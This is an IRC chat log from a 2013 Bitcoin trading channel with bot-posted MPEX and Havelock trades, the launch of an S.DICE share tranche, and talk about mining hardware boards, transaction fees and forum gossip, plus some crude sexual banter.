get out of the chair and move around Ukto Feb 06 03:53:46 usually when price is favorable Feb 06 03:53:49 mp lol Feb 06 03:53:55 heh Feb 06 03:54:08 jurov: c'mon, I was obviously kididng :) Feb 06 03:54:43 yeah, i saw the exercise option Feb 06 03:54:45 now you try to cover. but i know Feb 06 03:54:54 LOL Feb 06 03:56:16 jurov: approximately how fast do the orders make it to MPEX? Feb 06 03:56:37 is that manual or automatic? Feb 06 03:56:52 you're kidding me Feb 06 03:56:55 or? Feb 06 03:57:47 sorry i didn't watch last time Feb 06 03:58:15 i've hired a small army of indians that compose orders and parse STAT responses Feb 06 03:58:19 lol Feb 06 03:58:30 [MPEX] [S.MPOE] 4321 @ 0.00067106 = 2.8997 BTC [-] Feb 06 03:58:32 [MPEX] [S.MPOE] 5879 @ 0.00067075 = 3.9433 BTC [-] Feb 06 03:58:34 hehehe Feb 06 03:58:40 thought you had computer minions Feb 06 03:59:09 indians ? pfft they cost too much Feb 06 03:59:23 I have oompaloompas. Feb 06 03:59:23 slavegirls ftw. Feb 06 03:59:25 I pay them in chocolate. Feb 06 03:59:26 it's how i run mpex. Feb 06 03:59:37 [MPEX] [S.MPOE] 4321 @ 0.00067987 = 2.9377 BTC [+] Feb 06 03:59:37 the entire server stuff is just a front. they do it on abacuses Feb 06 03:59:38 [MPEX] [S.MPOE] 429 @ 0.00067995 = 0.2917 BTC [+] Feb 06 03:59:43 mircea_popescu: I could tell from the pic of you with the cane, and the girls with marks :P Feb 06 03:59:49 suspected so much Feb 06 03:59:55 i was just checking, cuz i don't want to just keep canceling if it makes you have to reenter orders Feb 06 03:59:55 marks look good on girl butt. Feb 06 03:59:59 btw, are you a pimp out there? Feb 06 04:00:02 nope. Feb 06 04:00:12 im just an efficient educator. Feb 06 04:00:19 LOL Feb 06 04:01:01 pretty questionable i must say Feb 06 04:01:54 i wonder if they knew theyd be on display hmm Feb 06 04:02:44 yup. Feb 06 04:03:21 it was u with the small pecker i knew it Feb 06 04:03:35 haha nah, that's not me Feb 06 04:03:43 sure sure Feb 06 04:03:49 actually that guy is kinda famous tho his name escapes me atm Feb 06 04:04:11 but he's done a buncha stuff with acworth Feb 06 04:04:21 must be doing well if small peckers gets him action like that Feb 06 04:05:43 i'm thinking of ordering dominos just to use coinsforpizza... Feb 06 04:06:09 i just had pizza Feb 06 04:06:32 ive had/made better Feb 06 04:08:50 [MPEX] [S.MPOE] 10325 @ 0.00067374 = 6.9564 BTC [-] Feb 06 04:08:59 lless than an hour now Feb 06 04:09:14 what goes on then Feb 06 04:09:31 lol Feb 06 04:10:23 the plummeting of btc commences? Feb 06 04:10:31 dice shares Feb 06 04:10:31 lol Feb 06 04:11:15 oh and i was just about to leave that wouldve been bad Feb 06 04:11:19 hehehe Feb 06 04:11:51 llticker Feb 06 04:11:52 bah Feb 06 04:11:54 ;;ticker Feb 06 04:11:54 BTCUSD ticker | Best bid: 20.70104, Best ask: 20.71000, Bid-ask spread: 0.00896, Last trade: 20.71000, 24 hour volume: 28227.91403729, 24 hour low: 20.20000, 24 hour high: 20.86300, 24 hour vwap: 20.58707 Feb 06 04:12:49 new daily high Feb 06 04:12:54 i have a general idea of how this works but still clueless sigh Feb 06 04:13:13 takes time. Feb 06 04:14:23 a few utubes kinda did esp the long super techy one (that i didnt get) Feb 06 04:14:36 but these channels add all the terms .. Feb 06 04:14:59 i used bitinstant today... Feb 06 04:15:07 I thought evoorhees would have spaced slices more Feb 06 04:15:08 i gotta say i appreciate the service Feb 06 04:15:16 but wow those are high fees Feb 06 04:15:25 [MPEX] [S.DICE] 450 @ 0.0059 = 2.655 BTC [-] Feb 06 04:15:29 thought bitcoins didnt have fees? Feb 06 04:15:36 quasi banking going on Feb 06 04:16:39 [MPEX] [S.MPOE] 4321 @ 0.00067109 = 2.8998 BTC [-] Feb 06 04:16:41 [MPEX] [S.MPOE] 529 @ 0.00067075 = 0.3548 BTC [-] Feb 06 04:17:18 truffles why did you think that ? Feb 06 04:17:42 cuz u can mine it for free and thats the impression i got Feb 06 04:17:42 Namworld: hehe, having trouble coming up with fund fast enough? lol Feb 06 04:18:48 truffles it's a false impression tho. all transactions large enough or out of fresh enugh inputs carry fee. Feb 06 04:18:56 it's to tjhe tune of 0.0005 btc, which is very small Feb 06 04:19:03 but fees there are, built into the system Feb 06 04:19:07 adds up though Feb 06 04:19:27 rather put it in savings acct.. Feb 06 04:19:43 you have a savings account with no fees? Feb 06 04:19:54 it pays interest Feb 06 04:20:16 does it now Feb 06 04:20:19 small potatoes ldo Feb 06 04:20:59 bitcoins pay interest or dividends? Feb 06 04:21:08 [MPEX] [S.DICE] 800 @ 0.0057 = 4.56 BTC [-] Feb 06 04:21:09 huh? Feb 06 04:21:17 neither really Feb 06 04:21:28 they can appreciate in relation to another currency Feb 06 04:21:33 http://bitcoin.org/ luke got booted off the list ? Feb 06 04:21:40 or am i imagining things ? Feb 06 04:21:50 oh tied to fiat how nice Feb 06 04:22:09 but they themselves don't give either...you could invest in a bond like namworld's and get interest, or you could invest in a stock like S.DICE which offers dividends Feb 06 04:22:19 [MPEX] [S.DICE] 1500 @ 0.00561 = 8.415 BTC [-] Feb 06 04:22:28 i mean, the only way to measure the appreciation is against something else Feb 06 04:22:36 that's always the case. Feb 06 04:22:38 1 bitcoin is always 1 bitcoin Feb 06 04:22:53 not tied to fiat Feb 06 04:23:01 [MPEX] [S.DICE] 1698 @ 0.00556001 = 9.4409 BTC [-] Feb 06 04:25:01 [MPEX] [S.BBET] 500 @ 0.001101 = 0.5505 BTC [-] Feb 06 04:25:14 its too cosy though Feb 06 04:25:28 lol Feb 06 04:25:32 i just got filled on S.DICE Feb 06 04:26:20 [MPEX] [S.MPOE] 2150 @ 0.00067075 = 1.4421 BTC [-] Feb 06 04:26:29 http://i.imgur.com/ojApgSB.jpg Feb 06 04:26:29 lol Feb 06 04:26:39 i don't know much about electronics, but anyone explain what the top chip is ? Feb 06 04:26:41 u making asics now MP ? Feb 06 04:26:56 the big black swuare next to the power? Feb 06 04:26:56 mircea_popescu: the markings are scraped off Feb 06 04:27:01 gesell i can see that. Feb 06 04:27:09 par for the course for bfl by now Feb 06 04:27:11 oh, its a bfl board Feb 06 04:27:15 but based on the design i would guess a processor to manage the array of whatever chips are missing Feb 06 04:27:24 did BFL make some announcement? Feb 06 04:27:30 i have been hiding in code for hours Feb 06 04:27:33 Ukyo yea Feb 06 04:27:43 [MPEX] [S.MPOE] 8442 @ 0.00067075 = 5.6625 BTC [-] Feb 06 04:27:54 was allso looking at the booard a while back Feb 06 04:27:55 there's arm processor socket on lower left Feb 06 04:27:58 not sure what to make of it Feb 06 04:28:01 yeah, exactly Feb 06 04:28:04 the arm socket throws me off Feb 06 04:28:13 gesell what gets me is that it's oriented AGAINST the missing chips Feb 06 04:28:16 forum url ? Feb 06 04:28:17 which seems weird Feb 06 04:28:18 does it ? Feb 06 04:28:20 mjr_: someone is a bit optimistic about that arb opp Feb 06 04:28:23 pretty compact design whomever done it Feb 06 04:28:32 at least they are using solid state caps :P Feb 06 04:29:07 but the FTDI chip for USB to Serial is common for communicating with microelectronics (see an old arduino) so its placement close to U11 (the largger unmarked chip) makes me think this would be the cpu are, but who knows Feb 06 04:29:32 oh yeah, do you guys think fpga's will still be useful? Feb 06 04:29:37 gesell: we talking the avalon? Feb 06 04:29:50 mjr_ for a while yet Feb 06 04:29:52 didnt they just rip a MIPS board out of a wifi AP? Feb 06 04:30:15 there should be a countdown clock on this next wave Feb 06 04:30:16 Diablo-D3: no we're talking this http://i.imgur.com/ojApgSB.jpg Feb 06 04:30:40 oh, the never shipping bfl board?? Feb 06 04:30:50 also, lol Puppet tried to attack me in the asicminer thread Feb 06 04:30:58 because I stood up for jgzarik as being legit Feb 06 04:31:13 truffles, erik did not say 10pm exactly. just around Feb 06 04:31:39 i wanna watch it unfold but im getting impatient lol Feb 06 04:31:42 jurov: btw, the biggest chip? its probably a hardcopy babysitter design Feb 06 04:32:24 http://jheusser.github.com/2013/02/03/satcoin.html Feb 06 04:32:27 this is kinda interesting Feb 06 04:32:30 heuristic mining Feb 06 04:32:33 indeed Feb 06 04:32:35 i wonder if it will ever come to anything Feb 06 04:32:47 yah Feb 06 04:32:54 but its super slow Feb 06 04:33:05 mircea_popescu: sat solving is very hard with sha256 or any decent hash Feb 06 04:33:16 mircea_popescu: we already skip as many steps as possible Feb 06 04:33:29 yes, my thought is BNF is too big and won't fit to GPU Feb 06 04:33:45 mircea_popescu: like, you know how we check H==0? thats actually a form of very basic sat solving Feb 06 04:33:54 tuned for the native integer width of the hardware Feb 06 04:34:18 I already looked into this about a year ago, couldnt get anywhere with it because GPUs dont have native booleans Feb 06 04:34:24 well, right. but you never know what someone comes up with Feb 06 04:35:22 The BFL board IS much prettier than the avalon board Feb 06 04:35:35 yeah. Feb 06 04:35:38 Bugpowduur: I dunno, I think the avalon board is a work of art Feb 06 04:35:40 but... with that first mover reward structure.... ugly wins Feb 06 04:35:44 a tractor versus a porsche Feb 06 04:35:49 everything is in the right place, and it has proper cooling Feb 06 04:36:05 seriously, what in holy fuck was wrong with BFL when they chose those coolers? Feb 06 04:36:15 instead of straight through airflow, it slams against the board causing hot spots Feb 06 04:36:50 (or if they have the fan reversed, it STILL causes hot spots) Feb 06 04:37:06 trying to work around it with a off the shelf heatpipe heatsink doesnt fix it Feb 06 04:37:09 [MPEX] [S.MPOE] 5958 @ 0.00066966 = 3.9898 BTC [-] Feb 06 04:37:11 [MPEX] [S.MPOE] 4321 @ 0.00067344 = 2.9099 BTC [+] Feb 06 04:37:12 [MPEX] [S.MPOE] 10725 @ 0.00067374 = 7.2259 BTC [+] Feb 06 04:37:14 [MPEX] [S.MPOE] 496 @ 0.00067634 = 0.3355 BTC [+] Feb 06 04:37:54 when did bfl release? Feb 06 04:38:24 mjr_: they released fpgas, not asics Feb 06 04:38:37 [MPEX] [O.BTCUSD.P200T] 12 @ 0.10495925 = 1.2595 BTC [-] Feb 06 04:39:17 http://bbs.btcman.com/data/attachment/forum/201302/05/172040xjxbedt1z4tjznd3.jpg Feb 06 04:39:20 i can't believe this stuff Feb 06 04:39:28 the avalon chips actualyl have no radiators AT ALL ? Feb 06 04:39:36 mircea_popescu: no no, they do Feb 06 04:39:41 well, I will defer to your judgement Diablo-D3 Feb 06 04:39:42 look at the rev 3 fpgas Feb 06 04:39:43 o, guy took them off Feb 06 04:39:55 the asics will be identical in design to those Feb 06 04:40:24 sticky aluminum heatsinks on the shit the heatpipe doesnt cover, and the folded heatpipe design on the asics Feb 06 04:40:45 oh Feb 06 04:40:48 you said avalon Feb 06 04:40:48 sorry Feb 06 04:41:05 mircea_popescu: look how the board is assembled Feb 06 04:41:14 the board is pressed into a giant industrial heatsink Feb 06 04:41:28 most likely those are flip chip packages, so the heat is actually facing into the board Feb 06 04:41:38 they probly have an extra thick copper grounding plane in the board Feb 06 04:41:47 which radiates heat out the other side of the board Feb 06 04:41:54 hm Feb 06 04:41:58 the other side is probably smooth as a baby's ass Feb 06 04:42:06 so they coated it in non-conducting ceramic paste Feb 06 04:42:11 and then sealed the heatsink into it Feb 06 04:42:47 the VRMs they use dont need heatsinks as they're probably 120c industrial/enterprise grade VRMs Feb 06 04:42:48 [MPEX] [S.DICE] 1750 @ 0.00616012 = 10.7802 BTC [+] Feb 06 04:43:05 and probably overkill for what they need Feb 06 04:43:21 and those caps are probably there to make sure flip/flop power usage doesnt kill the VRM Feb 06 04:44:12 Any LTC-GLOBAL shareholders in here having reviewed one of the MPEx pass-throughs with a NO/ABSTAIN, requesting more information? Feb 06 04:45:05 mircea_popescu: without having the board infront of me and a full suite of electrical diagnostic tools, Im going to have to say they did the right thing Feb 06 04:45:26 hehehe Feb 06 04:45:28 heyyoo Feb 06 04:45:35 mircea_popescu: oh, and btw, look closely Feb 06 04:45:39 mircea_popescu: I thought it was A board, its not Feb 06 04:45:42 mircea_popescu: its a bunch of tiny boards Feb 06 04:45:49 mircea_popescu: thats really clever of them Feb 06 04:45:56 [MPEX] [S.MPOE] 3504 @ 0.00067634 = 2.3699 BTC [+] Feb 06 04:45:58 [MPEX] [S.MPOE] 11871 @ 0.00067995 = 8.0717 BTC [+] Feb 06 04:45:59 [MPEX] [S.MPOE] 1600 @ 0.00068017 = 1.0883 BTC [+] Feb 06 04:45:59 even if a single shard fails, you can take it out and replace it Feb 06 04:46:01 [MPEX] [S.MPOE] 7075 @ 0.0006823 = 4.8273 BTC [+] Feb 06 04:46:05 <[\\\]> Wanna see something cool? Feb 06 04:46:14 <[\\\]> visit http://blockchain.info/charts and they will ip ban you Feb 06 04:46:20 <[\\\]> 'too many requests' Feb 06 04:46:28 <[\\\]> only its their own page making all of the requests. Feb 06 04:46:35 lol Feb 06 04:47:06 mircea_popescu: the BFL design is atrocious though Feb 06 04:47:07 [\\\] i got universal unlimited blockchain access so nyah Feb 06 04:47:38 [20:52:32] Ukyo pokes topace_ Feb 06 04:47:39 i am now? Feb 06 04:48:20 Ukto: whatsup? Feb 06 04:48:22 Hey Evoorhees. Popcorn is ready ! Up to you Feb 06 04:48:36 so has someone started an evoorhees scam thread yet? Feb 06 04:48:37 hey guys Feb 06 04:50:27 lol Feb 06 04:50:30 ftfy: mircea_popescu turns off mpex website in an attempt to emulate mtgox performances. Feb 06 04:50:37 countdown? Feb 06 04:50:50 jurov all the performances are belong to us Feb 06 04:50:51 I have 9:50pm here Feb 06 04:50:54 that about right? Feb 06 04:50:59 omg scamtime Feb 06 04:51:01 i managed to get 15 minutes off class time for this tranche :) Feb 06 04:51:07 its 9:51 Feb 06 04:51:27 mircea_popescu: all deposits in place? Feb 06 04:51:31 afaik. Feb 06 04:51:33 heeeee? Feb 06 04:51:45 lets check Feb 06 04:51:47 so is everyone going to place their bids last minute? Feb 06 04:51:54 no Feb 06 04:51:57 last second Feb 06 04:51:57 this should be interesting Feb 06 04:52:06 .0072 Feb 06 04:52:09 1MM Feb 06 04:52:10 dont forget your 00's Feb 06 04:52:12 haha Feb 06 04:52:12 :P Feb 06 04:52:15 heheh Feb 06 04:52:17 there will be so many bids being put market price, price will skyrocket to 0.1 BTC per share Feb 06 04:52:21 coupla more small ones. flushed. Feb 06 04:52:35 because people don't have time to enter a price Feb 06 04:52:35 The S.BBET IPO wuz like that Feb 06 04:52:43 bbet ipo was crazy Feb 06 04:52:44 in a good way Feb 06 04:54:47 ;;calc .1 * 100000000 * 20 Feb 06 04:54:48 200000000 Feb 06 04:55:12 [MPEX] [S.MPOE] 4321 @ 0.0006698 = 2.8942 BTC [-] Feb 06 04:55:13 [MPEX] [S.MPOE] 7329 @ 0.00066962 = 4.9076 BTC [-] Feb 06 04:55:42 someone is trying to scoop up the market orders after it runs out :) smart Feb 06 04:58:15 !ticker m s,dice Feb 06 04:58:16 The vision of Christ that thou dost see ... is my vision's greatest enemy. Feb 06 04:58:20 !ticker m s.dice Feb 06 04:58:21 [MPEX:S.DICE] 1D: 0.0042 / 0.00452317 / 0.00739497 (1021741 shares, 4,621.51 BTC), 7D: 0.0042 / 0.00561656 / 0.007395 (1692417 shares, 9,505.57 BTC), 30D: 0.00085848 / 0.00508378 / 0.0075 (6874086 shares, 34,946.35 BTC) Feb 06 05:00:05 live Feb 06 05:00:05 ready?!?!?!?!?! Feb 06 05:00:07 lol book still untouched Feb 06 05:00:35 [MPEX] [S.DICE] 2000 @ 0.00580001 = 11.6 BTC [-] Feb 06 05:00:43 Go!! Feb 06 05:00:45 go go go ! Feb 06 05:00:47 I'm ready ! Feb 06 05:00:51 go Feb 06 05:00:53 [MPEX] [S.DICE] 350000 @ 0.00589001 = 2061.5035 BTC [+] Feb 06 05:00:55 o/ Feb 06 05:00:56 [MPEX] [S.DICE] 5900 @ 0.00580001 = 34.2201 BTC [-] Feb 06 05:00:57 [MPEX] [S.DICE] 46800 @ 0.005708 = 267.1344 BTC [-] Feb 06 05:00:57 [MPEX] [S.DICE] 237000 @ 0.0057 = 1350.9 BTC [-] Feb 06 05:00:58 James, I hope you're ready! Feb 06 05:00:58 \o Feb 06 05:00:59 [MPEX] [S.DICE] 45354 @ 0.005623 = 255.0255 BTC [-] Feb 06 05:01:00 [MPEX] [S.DICE] 100000 @ 0.00557 = 557 BTC [-] Feb 06 05:01:01 [MPEX] [S.DICE] 2100 @ 0.0055601 = 11.6762 BTC [-] Feb 06 05:01:03 [MPEX] [S.DICE] 1000 @ 0.00556002 = 5.56 BTC [-] Feb 06 05:01:04 \o/ Feb 06 05:01:04 [MPEX] [S.DICE] 11802 @ 0.00556001 = 65.6192 BTC [-] Feb 06 05:01:05 [MPEX] [S.DICE] 175 @ 0.00556 = 0.973 BTC [-] Feb 06 05:01:06 [MPEX] [S.DICE] 360 @ 0.00556 = 2.0016 BTC [-] Feb 06 05:01:07 [MPEX] [S.DICE] 271 @ 0.00555 = 1.5041 BTC [-] Feb 06 05:01:09 [MPEX] [S.DICE] 1400 @ 0.00552012 = 7.7282 BTC [-] Feb 06 05:01:09 [MPEX] [S.DICE] 39144 @ 0.005515 = 215.8792 BTC [-] Feb 06 05:01:11 [MPEX] [S.DICE] 1000 @ 0.00551002 = 5.51 BTC [-] Feb 06 05:01:12 [MPEX] [S.DICE] 14000 @ 0.00550002 = 77.0003 BTC [-] Feb 06 05:01:12 106k left Feb 06 05:01:13 [MPEX] [S.DICE] 2000 @ 0.00550001 = 11 BTC [-] Feb 06 05:01:17 [MPEX] [S.DICE] 535 @ 0.0055 = 2.9425 BTC [-] Feb 06 05:01:18 [MPEX] [S.DICE] 416 @ 0.0055 = 2.288 BTC [-] Feb 06 05:01:19 [MPEX] [S.DICE] 5000 @ 0.0055 = 27.5 BTC [-] Feb 06 05:01:20 [MPEX] [S.DICE] 8655 @ 0.0055 = 47.6025 BTC [-] Feb 06 05:01:22 [MPEX] [S.DICE] 8385 @ 0.0055 = 46.1175 BTC [-] Feb 06 05:01:23 [MPEX] [S.DICE] 2800 @ 0.0055 = 15.4 BTC [-] Feb 06 05:01:24 [MPEX] [S.DICE] 4050 @ 0.0055 = 22.275 BTC [-] Feb 06 05:01:25 [MPEX] [S.DICE] 4120 @ 0.0055 = 22.66 BTC [-] Feb 06 05:01:25 [MPEX] [S.DICE] 20000 @ 0.0055 = 110 BTC [-] Feb 06 05:01:26 [MPEX] [S.DICE] 86125 @ 0.0055 = 473.6875 BTC [-] Feb 06 05:01:32 lmao this was quick Feb 06 05:01:35 damn Feb 06 05:01:37 I overpaid Feb 06 05:01:40 LOL Feb 06 05:01:45 400k left Feb 06 05:01:46 was like... 20 seconds or so ? Feb 06 05:01:48 Lol Feb 06 05:01:51 topace!! Feb 06 05:01:55 booya Feb 06 05:01:56 wow Feb 06 05:02:03 meet the power that be. Feb 06 05:02:03 Ho much did you get Feb 06 05:02:04 ? Feb 06 05:02:09 !ticker m s.dicer Feb 06 05:02:11 Bowjob: 120000 Feb 06 05:02:11 You know, I've had it up to here with this Indian malarkey. Feb 06 05:02:12 I'll drop more Feb 06 05:02:13 !ticker m s.dice Feb 06 05:02:14 [MPEX:S.DICE] 1D: 0.0042 / 0.00511066 / 0.00739497 (2023741 shares, 10,342.67 BTC), 7D: 0.0042 / 0.00565121 / 0.007395 (2694417 shares, 15,226.72 BTC), 30D: 0.00085848 / 0.00516341 / 0.0075 (7876086 shares, 40,667.50 BTC) Feb 06 05:02:22 so 120 shares? Feb 06 05:02:26 okay, im going to go open a complain thread on reddit Feb 06 05:02:31 1200 shares Feb 06 05:02:34 oh Feb 06 05:02:36 kk Feb 06 05:02:36 just have to think about what Feb 06 05:02:37 ;;calc 10342.67 - 4621.51 Feb 06 05:02:38 5721.16 Feb 06 05:02:40 cannot fucking belive people got it at .005 Feb 06 05:02:40 lol Feb 06 05:02:42 .0055 Feb 06 05:02:43 this gotta be some sort of record. Feb 06 05:02:43 412`625 0.00550000 Feb 06 05:02:44 lol Feb 06 05:02:45 someone lost. Feb 06 05:02:48 Sweet Feb 06 05:03:00 all gone? Feb 06 05:03:05 gratz Feb 06 05:03:17 that was fun :) Feb 06 05:03:21 sure was Feb 06 05:03:24 and now for havelock Feb 06 05:03:25 erik thats how you launch Feb 06 05:03:27 lol Feb 06 05:03:30 not that surprise 0.44 Feb 06 05:03:31 lol Feb 06 05:03:32 yeah, that was better Feb 06 05:03:34 I agree Feb 06 05:03:34 [HAVELOCK] [SDICE] 2 @ 0.645 = 1.29 BTC [-] Feb 06 05:03:35 [HAVELOCK] [SDICE] 19 @ 0.64 = 12.16 BTC [-] Feb 06 05:03:36 lesson learned Feb 06 05:03:36 [HAVELOCK] [SDICE] 30 @ 0.63 = 18.9 BTC [-] Feb 06 05:03:37 [HAVELOCK] [SDICE] 14 @ 0.6205 = 8.687 BTC [-] Feb 06 05:03:38 [HAVELOCK] [SDICE] 40 @ 0.615 = 24.6 BTC [-] Feb 06 05:03:38 even so i trusted you Feb 06 05:03:39 [HAVELOCK] [SDICE] 1 @ 0.61 BTC [-] Feb 06 05:03:40 [HAVELOCK] [SDICE] 1 @ 0.61 BTC [-] Feb 06 05:03:41 [HAVELOCK] [SDICE] 17 @ 0.61 = 10.37 BTC [-] Feb 06 05:03:42 [HAVELOCK] [SDICE] 3 @ 0.606 = 1.818 BTC [-] Feb 06 05:03:42 [HAVELOCK] [SDICE] 10 @ 0.606 = 6.06 BTC [-] Feb 06 05:03:43 [HAVELOCK] [SDICE] 60 @ 0.605 = 36.3 BTC [-] Feb 06 05:03:44 [HAVELOCK] [SDICE] 75 @ 0.6 = 45 BTC [-] Feb 06 05:03:45 [HAVELOCK] [SDICE] 3 @ 0.6 = 1.8 BTC [-] Feb 06 05:03:46 [HAVELOCK] [SDICE] 39 @ 0.59 = 23.01 BTC [-] Feb 06 05:03:47 [HAVELOCK] [SDICE] 17 @ 0.588 = 9.996 BTC [-] Feb 06 05:03:48 [HAVELOCK] [SDICE] 86 @ 0.5801 = 49.8886 BTC [-] Feb 06 05:03:49 [HAVELOCK] [SDICE] 1 @ 0.58 BTC [-] Feb 06 05:03:50 [HAVELOCK] [SDICE] 10 @ 0.58 = 5.8 BTC [-] Feb 06 05:03:51 [HAVELOCK] [SDICE] 29 @ 0.58 = 16.82 BTC [-] Feb 06 05:03:52 [HAVELOCK] [SDICE] 8 @ 0.571 = 4.568 BTC [-] Feb 06 05:03:52 [HAVELOCK] [SDICE] 87 @ 0.5702 = 49.6074 BTC [-] Feb 06 05:03:52 cute. Feb 06 05:03:53 oops Feb 06 05:03:53 [HAVELOCK] [SDICE] 10 @ 0.5702 = 5.702 BTC [-] Feb 06 05:03:54 [HAVELOCK] [SDICE] 100 @ 0.5701 = 57.01 BTC [-] Feb 06 05:03:55 [HAVELOCK] [SDICE] 4 @ 0.5701 = 2.2804 BTC [-] Feb 06 05:03:56 [HAVELOCK] [SDICE] 10 @ 0.5701 = 5.701 BTC [-] Feb 06 05:03:57 [HAVELOCK] [SDICE] 5 @ 0.57 = 2.85 BTC [-] Feb 06 05:03:58 [HAVELOCK] [SDICE] 10 @ 0.57 = 5.7 BTC [-] Feb 06 05:03:59 [HAVELOCK] [SDICE] 5 @ 0.57 = 2.85 BTC [-] Feb 06 05:04:00 [HAVELOCK] [SDICE] 10 @ 0.567 = 5.67 BTC [-] Feb 06 05:04:01 [HAVELOCK] [SDICE] 105 @ 0.566 = 59.43 BTC [-] Feb 06 05:04:02 [HAVELOCK] [SDICE] 99 @ 0.565 = 55.935 BTC [-] Feb 06 05:04:05 ouch Feb 06 05:04:06 Topace, is that you doing this? Feb 06 05:04:07 !ticker h sdice Feb 06 05:04:09 [HAVELOCK:SDICE] 1D: 0.52100000 / 0.60714756 / 0.76500000 (1719 shares, 1043.68665796 BTC), 7D: 0.52100000 / 0.68297815 / 0.89000000 (3601 shares, 2459.40431805 BTC), 30D: 0.44000000 / 0.61700758 / 0.89000000 (7230 shares, 4460.96483598 BTC) Feb 06 05:04:12 By any chance? Feb 06 05:04:16 BUY not SELL dude Feb 06 05:04:32 So, whats the next tranche for? Feb 06 05:04:38 just releasing the shares i bougt on mpex into havelock Feb 06 05:04:38 not sure yet Feb 06 05:04:41 recommendations? Feb 06 05:04:50 62? Feb 06 05:04:51 60something Feb 06 05:04:53 62 Feb 06 05:04:54 64? Feb 06 05:04:56 thats what i was thinking Feb 06 05:04:57 sqrt(-1) Feb 06 05:04:58 See, it's topace buying for his havelock bidders Feb 06 05:04:59 somewhere in that range Feb 06 05:05:15 62...not sure how high you will go with the last two... Feb 06 05:05:24 68 Feb 06 05:05:26 74 Feb 06 05:05:27 (0.60714756 / 0.55) * 1043 Feb 06 05:05:29 ;;calc (0.60714756 / 0.55) * 1043 Feb 06 05:05:30 1151.37255469 Feb 06 05:05:32 that could work Feb 06 05:05:34 [HAVELOCK] [SDICE] 8 @ 0.565 = 4.52 BTC [-] Feb 06 05:05:36 [HAVELOCK] [SDICE] 82 @ 0.565 = 46.33 BTC [-] Feb 06 05:05:39 that's a cool 100 btc Feb 06 05:05:49 not exactly bad for staying up nights. Feb 06 05:05:49 That was quick Feb 06 05:06:17 [MPEX] [S.MPOE] 4321 @ 0.00067634 = 2.9225 BTC [+] Feb 06 05:06:19 [MPEX] [S.MPOE] 4310 @ 0.00067644 = 2.9155 BTC [+] Feb 06 05:06:39 james, anymore? Feb 06 05:07:49 was 0.0044, then 0.0055 Feb 06 05:07:57 I recommand 66, 77, 88 Feb 06 05:08:11 the next one might sell fast Feb 06 05:08:16 the 8.8 might be pushing it, but dice is up Feb 06 05:08:18 :)\ Feb 06 05:08:20 further one will take some time... Feb 06 05:08:30 well that was fun - back to library tour :) Feb 06 05:08:34 :) Feb 06 05:08:34 [HAVELOCK] [SDICE] 200 @ 0.59 = 118 BTC [+] Feb 06 05:08:41 that's pretty aggressive, but the market might bear it Feb 06 05:08:54 bare Feb 06 05:08:54 that was.. exciting Feb 06 05:08:56 this launch is fun Feb 06 05:08:58 lol Feb 06 05:08:59 lame Feb 06 05:09:05 moar shares? Feb 06 05:09:06 :3 Feb 06 05:09:06 deffinitely better response than last night Feb 06 05:09:08 I paid .00589 Feb 06 05:09:14 for a lot of shares Feb 06 05:09:19 I have 29 more BTC to put in Feb 06 05:09:26 guess its better than .0066 Feb 06 05:09:31 :-P Feb 06 05:09:32 On Wed, 06 Feb 13 03:01:10 +0000 S.DICE - 20`000 bought @0.00550000 BTC, total cost 110.00000000BTC Feb 06 05:09:33 On Wed, 06 Feb 13 03:00:43 +0000 S.DICE - 100`000 bought @0.00557000 BTC, total cost 557.00000000BTC Feb 06 05:09:40 is all i got, sorry Bowjob Feb 06 05:09:41 you people were supposed to bid more Feb 06 05:09:44 aight Feb 06 05:09:51 Bugpowduur no it's bear. Feb 06 05:10:03 i was debating calling you last night. my pain was enormous Feb 06 05:10:08 0.44 up for grabs Feb 06 05:10:09 lol Feb 06 05:10:12 lol yea Feb 06 05:10:13 u were asleep Feb 06 05:10:18 suck i had a headache and went ot bed early :( Feb 06 05:10:22 :( Feb 06 05:10:30 u got 200 on reserve :P Feb 06 05:10:42 200? Feb 06 05:10:48 [22:08:26] <@assbot> [HAVELOCK] [SDICE] 200 @ 0.59 = 118 BTC [+] Feb 06 05:10:49 nope Feb 06 05:10:51 you said you got 120k Feb 06 05:10:52 mhm Feb 06 05:10:53 oh Feb 06 05:10:58 u sold some at higher Feb 06 05:11:00 kk Feb 06 05:11:09 ;;calc 0.00039001 * 350000 Feb 06 05:11:09 136.5035 Feb 06 05:11:10 yea i only did the 100k first Feb 06 05:11:14 hows the forum drama level ? Feb 06 05:11:29 then i listed the second 20k at the same price, but it filled higher Feb 06 05:11:38 cuz there was a bid for it Feb 06 05:12:01 MP: duno, dont care. its forums Feb 06 05:12:02 :P Feb 06 05:12:02 last night some panic buyers sold Feb 06 05:12:05 [MPEX] [S.DICE] 1050 @ 0.00599997 = 6.3 BTC [+] Feb 06 05:12:06 at havelock Feb 06 05:12:07 lol Feb 06 05:12:14 i wonder if they got back in Feb 06 05:13:31 you should care, bitcoins are backed by drama Feb 06 05:13:38 it was a coinflip for me whether you'd do an IPO style offering Feb 06 05:13:42 or just pump the shares out Feb 06 05:13:49 in teh jungle Feb 06 05:13:54 they were being pumped out here, so i had to do the same on havelock Feb 06 05:14:11 yeah, ididnt bid high enough Feb 06 05:14:11 hah the forum is down Feb 06 05:14:16 yup Feb 06 05:14:31 dude you'd think they'd get some servers already Feb 06 05:14:46 they make a fucking killing off those stupid ads Feb 06 05:14:47 out of the three times i tried to laod it this week it was down 2 Feb 06 05:15:02 it's like... trying to fail or something Feb 06 05:15:13 theymos is busy trying to loan out all of the BTC the forum owns Feb 06 05:15:32 lol Feb 06 05:15:58 o srsly ? Feb 06 05:16:11 whatcouldpossiblygowrong.activex Feb 06 05:16:18 im sorry Feb 06 05:16:21 .rubyonrails Feb 06 05:16:22 i dont know that he actually does that Feb 06 05:16:22 heh Feb 06 05:16:29 [MPEX] [S.MPOE] 4321 @ 0.0006698 = 2.8942 BTC [-] Feb 06 05:16:29 [MPEX] [S.MPOE] 17438 @ 0.00066962 = 11.6768 BTC [-] Feb 06 05:16:56 https://bitcointalk.org/index.php?topic=141503.msg1477592;boardseen#new Feb 06 05:17:11 0,0 Feb 06 05:17:13 heh Feb 06 05:18:22 "If you're interested, post here with how much you would charge for this service and what your reserve policy would be." Feb 06 05:18:27 giving out loans, and paying to do it Feb 06 05:18:28 lol Feb 06 05:18:43 i'll watch your money for free Feb 06 05:19:01 "Full reserve is not a requirement, but you will be responsible for returning the money" Feb 06 05:19:08 Bad Idea(tm) Feb 06 05:19:10 ;;ticker Feb 06 05:19:10 BTCUSD ticker | Best bid: 20.83107, Best ask: 20.85732, Bid-ask spread: 0.02625, Last trade: 21.09990, 24 hour volume: 35064.14470227, 24 hour low: 